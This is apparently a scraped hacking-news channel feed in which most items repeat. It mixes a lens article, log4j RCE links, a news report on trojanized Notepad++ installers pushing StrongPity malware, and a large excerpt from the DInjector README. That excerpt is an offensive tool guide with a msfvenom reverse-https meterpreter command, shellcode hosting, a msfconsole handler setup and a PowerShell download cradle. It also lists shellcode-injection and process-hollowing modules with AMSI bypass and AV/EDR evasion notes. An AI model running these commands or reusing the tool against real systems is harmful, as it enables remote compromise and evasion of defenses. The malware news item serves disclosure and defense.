Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
35mm vs 50mm vs 85mm, Which One Is Right for You?
https://cdn-images-1.medium.com/max/624/1*gm7eQYU80abv6ZZkQ-QczA.png
After you’ve been interested in photographing for a while, you’ve probably have heard excellent things regarding prime lenses like 35mm…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
35mm vs 50mm vs 85mm, Which One Is Right for You?
https://cdn-images-1.medium.com/max/624/1*gm7eQYU80abv6ZZkQ-QczA.png
After you’ve been interested in photographing for a while, you’ve probably have heard excellent things regarding prime lenses like 35mm…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
35mm vs 50mm vs 85mm, Which One Is Right for You?
After you’ve been interested in photographing for a while, you’ve probably have heard excellent things regarding prime lenses like 35mm…
Trivial RCE in log4j
https://www.reddit.com/r/redteamsec/comments/rd38ul/trivial_rce_in_log4j/
submitted by /u/dfv157 (https://www.reddit.com/user/dfv157)
[link] (https://www.lunasec.io/docs/blog/log4j-zero-day/) [comments] (https://www.reddit.com/r/redteamsec/comments/rd38ul/trivial_rce_in_log4j/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/rd38ul/trivial_rce_in_log4j/
submitted by /u/dfv157 (https://www.reddit.com/user/dfv157)
[link] (https://www.lunasec.io/docs/blog/log4j-zero-day/) [comments] (https://www.reddit.com/r/redteamsec/comments/rd38ul/trivial_rce_in_log4j/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Trivial RCE in log4j
Posted in r/redteamsec by u/dfv157 • 1 point and 0 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Automated Bug Hunting: Fuzzing
https://external-preview.redd.it/ti8yJUokATldSWIBqUWbKN4mQ21ccMO9BP5PbV4Q6AI.jpg?width=640&crop=smart&auto=webp&s=94c239c590ee91744fdf0a903cb4bf66db0c7ceb submitted by /u/PCtheawesome1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Automated Bug Hunting: Fuzzing
https://external-preview.redd.it/ti8yJUokATldSWIBqUWbKN4mQ21ccMO9BP5PbV4Q6AI.jpg?width=640&crop=smart&auto=webp&s=94c239c590ee91744fdf0a903cb4bf66db0c7ceb submitted by /u/PCtheawesome1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Automated Bug Hunting: Fuzzing
Posted in r/hacking by u/PCtheawesome1 • 1 point and 0 comments
hacking: security in practice
RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
submitted by /u/donutloop
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec
submitted by /u/donutloop
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
RCE 0-day exploit found in log4j, a popular Java logging package |...
Posted in r/hacking by u/donutloop • 29 points and 4 comments
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Malicious Notepad++ installers push StrongPity malware
https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Malicious Notepad++ installers push StrongPity malwarePost Views: 162 https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-1.png Reading Time: 1 Minute
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.
This hacking group, also known as APT-C-41 and Promethium, was previously seen distributing trojanized WinRAR installers in highly-targeted campaigns between 2016 and 2018, so this technique is not new.
The recent lure involves Notepad++, a very popular free text and source code editor for Windows used in a wide range of organizations.
The discovery of the tampered installer comes from a threat analyst known as ‘blackorbird’ analysts, while Minerva Labs reports on the malware. #APT #StrongPity NotePad++ installer(npp.8.1.7.Installer.x64.exe)
78556a2fc01c40f64f11c76ef26ec3ff
http[:]//advancedtoenableplatform.com pic.twitter.com/eEXZWIObnH
— blackorbird (@blackorbird) November 30, 2021
See Also: Complete Offensive Security and Ethical Hacking Course
Upon executing the Notepad++ installer, the file creates a folder named “Windows Data” under C:\ProgramData\Microsoft, and drops the following three files:
* npp.8.1.7.Installer.x64.exe – the original Notepad++ installation file under C:\Users\Username\AppData\Local\Temp\ folder.
* winpickr.exe – a malicious file under C:\Windows\System32 folder.
* ntuis32.exe – malicious keylogger under C:\ProgramData\Microsoft\WindowsData folder
The installation of the code editor continues as expected, and the victim won’t see anything out of the ordinary that could raise suspicions.
As the setup finishes, a new service named “PickerSrv” is created, establishing the malware’s persistence via startup execution.
https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/service.png
Stay safeIf you need to use Notepad++, make sure to source an installer from the project’s website.
The software is available on numerous other websites, some of which claim to be the official Notepad++ portals but may include adware or other unwanted software.
The URL that was distributing the laced installer has been taken down following its identification by analysts, but the actors could quickly register a new one.
Follow the same precautions with all software tools you’re using, no matter how niche they are, as sophisticated actors are particularly interested in specialized software cases that are ideal for watering hole attacks.
In this case, the chances of detection from an AV tool on the system would be roughly 50%, so using up-to-date security tools is essential too.
See Also: Ha[...]
___________________________
@hacking_Attack
@Hacking_Video
Malicious Notepad++ installers push StrongPity malware
https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Malicious Notepad++ installers push StrongPity malwarePost Views: 162 https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-1.png Reading Time: 1 Minute
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.
This hacking group, also known as APT-C-41 and Promethium, was previously seen distributing trojanized WinRAR installers in highly-targeted campaigns between 2016 and 2018, so this technique is not new.
The recent lure involves Notepad++, a very popular free text and source code editor for Windows used in a wide range of organizations.
The discovery of the tampered installer comes from a threat analyst known as ‘blackorbird’ analysts, while Minerva Labs reports on the malware. #APT #StrongPity NotePad++ installer(npp.8.1.7.Installer.x64.exe)
78556a2fc01c40f64f11c76ef26ec3ff
http[:]//advancedtoenableplatform.com pic.twitter.com/eEXZWIObnH
— blackorbird (@blackorbird) November 30, 2021
See Also: Complete Offensive Security and Ethical Hacking Course
Upon executing the Notepad++ installer, the file creates a folder named “Windows Data” under C:\ProgramData\Microsoft, and drops the following three files:
* npp.8.1.7.Installer.x64.exe – the original Notepad++ installation file under C:\Users\Username\AppData\Local\Temp\ folder.
* winpickr.exe – a malicious file under C:\Windows\System32 folder.
* ntuis32.exe – malicious keylogger under C:\ProgramData\Microsoft\WindowsData folder
The installation of the code editor continues as expected, and the victim won’t see anything out of the ordinary that could raise suspicions.
As the setup finishes, a new service named “PickerSrv” is created, establishing the malware’s persistence via startup execution.
https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/service.png
Stay safeIf you need to use Notepad++, make sure to source an installer from the project’s website.
The software is available on numerous other websites, some of which claim to be the official Notepad++ portals but may include adware or other unwanted software.
The URL that was distributing the laced installer has been taken down following its identification by analysts, but the actors could quickly register a new one.
Follow the same precautions with all software tools you’re using, no matter how niche they are, as sophisticated actors are particularly interested in specialized software cases that are ideal for watering hole attacks.
In this case, the chances of detection from an AV tool on the system would be roughly 50%, so using up-to-date security tools is essential too.
See Also: Ha[...]
___________________________
@hacking_Attack
@Hacking_Video
Black Hat Ethical Hacking
Malicious Notepad++ installers push StrongPity malware | Black Hat Ethical Hacking
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Malicious Notepad++ installers push StrongPity malware https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Malicious Notepad++ installers push StrongPity malwarePost Views: 162 https://www.b…
cking stories – Operation Troy – How researchers linked the cyberattacks Source: www.bleepingcomputer.com (Click Link)https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/Untitled-design.png Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/Kali-Linux-2021.4-Released-90x90.png Kali Linux 2021.4 Released – New Themes and Tools, name-that-hash, truffleHog, S3Scanner, KDE Plasma 5.2311 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/cover_image_1598944248.jpg.760x400_q85_crop_upscale-90x90.jpg Hackers infect random WordPress plugins to steal credit cards1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-2-90x90.jpg 27 flaws in USB-over-network SDK affect millions of cloud users2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/5fdb9e7105edc00d5378b856_kafkalogo-90x90.jpg Apache Kafka Cloud Clusters Expose Sensitive Data for Large Companies3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/Excel-als-Malware-Schleuder-Gefahr-durch-XLL-Dateien-Twitter-90x90.png Malicious Excel XLL add-ins push RedLine password-stealing malware4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-1-90x90.jpg New malware hides as legit nginx process on e-commerce servers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-90x90.jpg Microsoft Exchange servers hacked to deploy BlackByte ransomware1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/80-percent-e-commerce-android-apps-leak-personal-data-765x383-1-90x90.jpg Android banking malware infects 300,000 Google Play users1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/PKM201070290_resize-90x90.jpg Panasonic discloses data breach after network hack1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/0_Windows-headpic-90x90.jpg New Windows 10 zero-day gives admin rights, gets unofficial patch2 weeks ago
The post Malicious Notepad++ installers push StrongPity malware first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/cover_image_1598944248.jpg.760x400_q85_crop_upscale-90x90.jpg Hackers infect random WordPress plugins to steal credit cards1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-2-90x90.jpg 27 flaws in USB-over-network SDK affect millions of cloud users2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/5fdb9e7105edc00d5378b856_kafkalogo-90x90.jpg Apache Kafka Cloud Clusters Expose Sensitive Data for Large Companies3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/Excel-als-Malware-Schleuder-Gefahr-durch-XLL-Dateien-Twitter-90x90.png Malicious Excel XLL add-ins push RedLine password-stealing malware4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-1-90x90.jpg New malware hides as legit nginx process on e-commerce servers1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/ezgif.com-gif-maker-90x90.jpg Microsoft Exchange servers hacked to deploy BlackByte ransomware1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/12/80-percent-e-commerce-android-apps-leak-personal-data-765x383-1-90x90.jpg Android banking malware infects 300,000 Google Play users1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/PKM201070290_resize-90x90.jpg Panasonic discloses data breach after network hack1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/11/0_Windows-headpic-90x90.jpg New Windows 10 zero-day gives admin rights, gets unofficial patch2 weeks ago
The post Malicious Notepad++ installers push StrongPity malware first appeared on Black Hat Ethical Hacking.
___________________________
@hacking_Attack
@Hacking_Video
i am trying to exploit SSH User Code Execution but getting this error why?
https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/
___________________________
@hacking_Attack
@Hacking_Video
reddit
i am trying to exploit SSH User Code Execution but getting this...
Posted in r/Pentesting by u/noobsix9 • 1 point and 4 comments
https://preview.redd.it/yo34s4re8o481.png?width=1366&format=png&auto=webp&s=d6daab49d1c87b4ec8aa2d20483b40df71631abe submitted by /u/noobsix9 (https://www.reddit.com/user/noobsix9)
[link] (https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/) [comments] (https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/)
___________________________
@hacking_Attack
@Hacking_Video
[link] (https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/) [comments] (https://www.reddit.com/r/Pentesting/comments/rd3mxj/i_am_trying_to_exploit_ssh_user_code_execution/)
___________________________
@hacking_Attack
@Hacking_Video
Using Twitter as a Bug Bounty Hunter
https://karanxarora.medium.com/using-twitter-as-a-bug-bounty-hunter-bb0e86eea2ee?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://karanxarora.medium.com/using-twitter-as-a-bug-bounty-hunter-bb0e86eea2ee?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Using Twitter as a Bug Bounty Hunter
Hi guys, I’m back with another quick and useful writeup for you guys.
Hi guys, I’m back with another quick and useful writeup for you guys.Continue reading on Medium » (https://karanxarora.medium.com/using-twitter-as-a-bug-bounty-hunter-bb0e86eea2ee?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Using Twitter as a Bug Bounty Hunter
Hi guys, I’m back with another quick and useful writeup for you guys.
DInjector - Collection Of Shellcode Injection Techniques Packed In A D/Invoke Weaponized DLL
http://www.kitploit.com/2021/12/dinjector-collection-of-shellcode.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/12/dinjector-collection-of-shellcode.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
This repository is an accumulation of my code snippets for various shellcode injection techniques using fantastic D/Invoke (https://thewover.github.io/Dynamic-Invoke/) API by @TheWover and @FuzzySecurity. Features: Fully ported to D/Invoke API Encrypted payloads which can be invoked from a URL or passed in base64 as an argument Built-in AMSI bypass PPID spoofing and block non-Microsoft DLLs (stolen from TikiTorch (https://github.com/rasta-mouse/TikiTorch), write-up is here (https://offensivedefence.co.uk/posts/ppidspoof-blockdlls-dinvoke/)) Sandbox detection & evasion Based on my testings the DInvoke NuGet package (https://www.nuget.org/packages/DInvoke/) itself is being flagged by many commercial AV/EDR solutions when incuded as an embedded (https://www.kitploit.com/search/label/Embedded) resource via Costura.Fody (https://www.nuget.org/packages/Costura.Fody/) (or similar approaches), so I've shrinked it a bit and included from source (https://github.com/TheWover/DInvoke) to achieve better OpSec.
Usage Compile the project in VS. Generate a shellcode for your favourite C2: ~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin Encrypt (https://github.com/snovvcrash/DInjector/blob/main/encrypt.py) the shellcode: ~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc Serve the encrypted shellcode and prepare C2 listener: ~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run" Use the PowerShell (https://www.kitploit.com/search/label/PowerShell) download cradle (https://github.com/snovvcrash/DInjector/blob/main/cradle.ps1) to load DInjector.dll as System.Reflection.Assembly and execute it from memory. I do not recommend putting the assembly (https://www.kitploit.com/search/label/Assembly) on disk because it will very likely be flagged.Required global arguments: Name Example Value Description /am51 True, False Applies AMSI bypass /sc http://10.10.13.37/enc Sets shellcode path (can be loaded from URL or as a Base64 string) /password Passw0rd! Sets password to decrypt the shellcode Modules OpSec safe considerations are based on my personal usage expirience and some testings along the way.FunctionPointer (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/FunctionPointer.cs) module_name: 'functionpointer'
description: |
Allocates a RWX memory region, copies the shellcode into it
and executes it like a function.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/'
- 'https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis'
- 'https://www.fergonez.net/post/shellcode-csharp' FunctionPointerV2 (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/FunctionPointerV2.cs) module_name: 'functionpointerv2'
description: |
Sets RWX on a byte array and executes it like a function.
calls:
- ntdll.dll:
1: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-1/'
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-2/'
- 'https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs' CurrentThread (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/CurrentThread.cs) module_name: 'currentthread'
description: |
Injects shellcode into current process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
3: 'NtCreateThreadEx'
4: 'NtWaitForSingleObject'
___________________________
@hacking_Attack
@Hacking_Video
Usage Compile the project in VS. Generate a shellcode for your favourite C2: ~$ msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f raw -o shellcode.bin Encrypt (https://github.com/snovvcrash/DInjector/blob/main/encrypt.py) the shellcode: ~$ encrypt.py shellcode.bin -p 'Passw0rd!' -o enc Serve the encrypted shellcode and prepare C2 listener: ~$ sudo python3 -m http.server 80
~$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_winhttps; set lhost 10.10.13.37; set lport 443; set EXITFUNC thread; run" Use the PowerShell (https://www.kitploit.com/search/label/PowerShell) download cradle (https://github.com/snovvcrash/DInjector/blob/main/cradle.ps1) to load DInjector.dll as System.Reflection.Assembly and execute it from memory. I do not recommend putting the assembly (https://www.kitploit.com/search/label/Assembly) on disk because it will very likely be flagged.Required global arguments: Name Example Value Description /am51 True, False Applies AMSI bypass /sc http://10.10.13.37/enc Sets shellcode path (can be loaded from URL or as a Base64 string) /password Passw0rd! Sets password to decrypt the shellcode Modules OpSec safe considerations are based on my personal usage expirience and some testings along the way.FunctionPointer (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/FunctionPointer.cs) module_name: 'functionpointer'
description: |
Allocates a RWX memory region, copies the shellcode into it
and executes it like a function.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/'
- 'https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis'
- 'https://www.fergonez.net/post/shellcode-csharp' FunctionPointerV2 (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/FunctionPointerV2.cs) module_name: 'functionpointerv2'
description: |
Sets RWX on a byte array and executes it like a function.
calls:
- ntdll.dll:
1: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
opsec_safe: false
references:
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-1/'
- 'https://jhalon.github.io/utilizing-syscalls-in-csharp-2/'
- 'https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs' CurrentThread (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/CurrentThread.cs) module_name: 'currentthread'
description: |
Injects shellcode into current process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
3: 'NtCreateThreadEx'
4: 'NtWaitForSingleObject'
___________________________
@hacking_Attack
@Hacking_Video
thewover.github.io
Emulating Covert Operations - Dynamic Invocation (Avoiding PInvoke & API Hooks)
TLDR: Presenting DInvoke, a new API in SharpSploit that acts as a dynamic replacement for PInvoke. Using it, we show how to dynamically invoke unmanaged code from memory or disk while avoiding API Hooking and suspicious imports.
opsec_safe: false
references:
- 'https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs' RemoteThread (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThread.cs) module_name: 'remotethread'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
5: 'NtCreateThreadEx'
opsec_safe: false
references:
- 'https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs' RemoteThreadSuspended (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadSuspended.cs) protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx. calls: - ntdll.dll: 1: 'NtOpenProcess' 2: 'NtAllocateVirtualMemory (PAGE_READWRITE)' 3: 'NtWriteVirtualMemory' 4: 'NtProtectVirtualMemory (PAGE_NOACCESS)' 5: 'NtCreateThreadEx (CREATE_SUSPENDED)' 6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)' 7: 'NtResumeThread' opsec_safe: true references: - 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/' - 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs' ">module_name: 'remotethreadsuspended'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS.
After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_NOACCESS)'
5: 'NtCreateThreadEx (CREATE_SUSPENDED)'
6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/'
- 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs' RemoteThreadAPC (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadAPC.cs) module_name: 'remotethreadapc'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtQueueApcThread.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtOpenThread'
5: 'NtQueueApcThread'
6: 'NtAlertResumeThread'
opsec_safe: true
references:
- 'https://rastamouse.me/exploring-process-injection-opsec-part-2/'
- 'https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0' RemoteThreadContext (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadAPC.cs) module_name: 'remotethreadcontext'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via SetThreadContext.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtCreateThreadEx (CREATE_SUSPENDED)'
___________________________
@hacking_Attack
@Hacking_Video
references:
- 'https://github.com/XingYun-Cloud/D-Invoke-syscall/blob/main/Program.cs' RemoteThread (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThread.cs) module_name: 'remotethread'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
5: 'NtCreateThreadEx'
opsec_safe: false
references:
- 'https://github.com/S3cur3Th1sSh1t/SharpImpersonation/blob/main/SharpImpersonation/Shellcode.cs' RemoteThreadSuspended (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadSuspended.cs) protection to PAGE_NOACCESS. After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ. Thread execution via NtCreateThreadEx. calls: - ntdll.dll: 1: 'NtOpenProcess' 2: 'NtAllocateVirtualMemory (PAGE_READWRITE)' 3: 'NtWriteVirtualMemory' 4: 'NtProtectVirtualMemory (PAGE_NOACCESS)' 5: 'NtCreateThreadEx (CREATE_SUSPENDED)' 6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)' 7: 'NtResumeThread' opsec_safe: true references: - 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/' - 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs' ">module_name: 'remotethreadsuspended'
arguments: |
/pid:1337
description: |
Injects shellcode into an existing remote process and flips memory protection to PAGE_NOACCESS.
After a short sleep (waiting until a possible AV scan is finished) the protection is flipped again to PAGE_EXECUTE_READ.
Thread execution via NtCreateThreadEx.
calls:
- ntdll.dll:
1: 'NtOpenProcess'
2: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
3: 'NtWriteVirtualMemory'
4: 'NtProtectVirtualMemory (PAGE_NOACCESS)'
5: 'NtCreateThreadEx (CREATE_SUSPENDED)'
6: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/'
- 'https://github.com/plackyhacker/Suspended-Thread-Injection/blob/main/injection.cs' RemoteThreadAPC (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadAPC.cs) module_name: 'remotethreadapc'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtQueueApcThread.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtOpenThread'
5: 'NtQueueApcThread'
6: 'NtAlertResumeThread'
opsec_safe: true
references:
- 'https://rastamouse.me/exploring-process-injection-opsec-part-2/'
- 'https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0' RemoteThreadContext (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/RemoteThreadAPC.cs) module_name: 'remotethreadcontext'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via SetThreadContext.
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtAllocateVirtualMemory (PAGE_READWRITE)'
2: 'NtWriteVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READ)'
4: 'NtCreateThreadEx (CREATE_SUSPENDED)'
___________________________
@hacking_Attack
@Hacking_Video
GitHub
D-Invoke-syscall/Program.cs at main · XingYun-Cloud/D-Invoke-syscall
动态调用 syscall. Contribute to XingYun-Cloud/D-Invoke-syscall development by creating an account on GitHub.
5: 'GetThreadContext'
6: 'SetThreadContext'
7: 'NtResumeThread'
opsec_safe: true
references:
- 'https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/'
- 'https://github.com/djhohnstein/CSharpSetThreadContext/blob/master/Runner/Program.cs' ProcessHollow (https://github.com/snovvcrash/DInjector/blob/main/DInjector/Modules/ProcessHollow.cs) module_name: 'processhollow'
arguments: |
/image:C:\Windows\System32\svchost.exe /ppid:31337 /blockDlls:True
description: |
Injects shellcode into a newly spawned remote process.
Thread execution via NtResumeThread (hollowing with shellcode).
calls:
- kernel32.dll:
1: 'InitializeProcThreadAttributeList'
2: 'UpdateProcThreadAttribute (blockDLLs)'
3: 'UpdateProcThreadAttribute (PPID)'
4: 'CreateProcessA'
- ntdll.dll:
1: 'NtQueryInformationProcess'
2: 'NtReadVirtualMemory'
3: 'NtProtectVirtualMemory (PAGE_EXECUTE_READWRITE)'
4: 'NtWriteVirtualMemory'
